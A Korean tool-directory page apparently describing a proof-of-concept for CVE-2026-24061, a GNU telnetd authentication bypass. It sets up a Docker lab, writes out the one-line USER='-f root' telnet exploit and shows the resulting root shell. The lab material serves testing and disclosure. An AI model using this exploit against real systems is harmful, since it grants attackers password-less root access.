Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061 — GNU InetUtils의 GNU telnetd 서비스 인증 우회 | Kitploit
도구/GitHubGitHub/typeconfused/cve-2026-24061
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtypeconfused/cve-2026-24061

CVE-2026-24061

GNU InetUtils의 GNU telnetd 서비스 인증 우회

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

GNU InetUtils telnetd 인수 주입 인증 우회 (CVE-2026-24061)

2026년 1월, GNU InetUtils의 GNU telnetd 서비스에서 Kyu Neushwaistein (일명 Carlos Cortes Alvarez)이 인증 우회 취약점을 발견했습니다. CVE-2026-24061로 추적되는 이 결함은 공격자가 유효한 자격 증명을 제공하지 않고도 Telnet 세션을 설정하여 대상 시스템에 대한 무단 액세스를 허용합니다. 이 취약점은 GNU telnetd 서비스의 2.7-2 버전까지 존재하며, 90년대에서 그대로 가져온 것처럼 보입니다.

이는 CVSS v3.1 점수 9.8 (치명적) 인 인수 주입 취약점(CWE-88)입니다.

참고 자료:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24061
  • https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
  • https://github.com/SafeBreach-Labs/CVE-2026-24061

취약 환경

빌드 및 실행:

root@kitploit:~
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061

서비스가 시작된 후 telnetd는 포트 23에서 수신 대기합니다.

공격 방법

이 취약점은 USER 환경 변수에 -f 플래그를 주입하여 인증을 우회할 수 있게 합니다. telnetd가 -f로 시작하는 사용자 이름을 수신하면 이를 login 프로그램에 전달하고, login 프로그램은 -f를 인증을 건너뛰는 플래그로 해석합니다.

다음 명령을 사용하여 이 취약점을 악용하고 root 액세스 권한을 얻을 수 있습니다:

root@kitploit:~
# Linux 클라이언트 (-a 옵션 필요)
USER="-f root" telnet -a 127.0.0.1 23

# macOS 클라이언트 (-a 옵션 불필요)
USER="-f root" telnet 127.0.0.1 23

성공적으로 악용한 후에는 비밀번호를 제공하지 않고도 root 셸에 액세스할 수 있습니다.

root@kitploit:~
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
도구 다운로드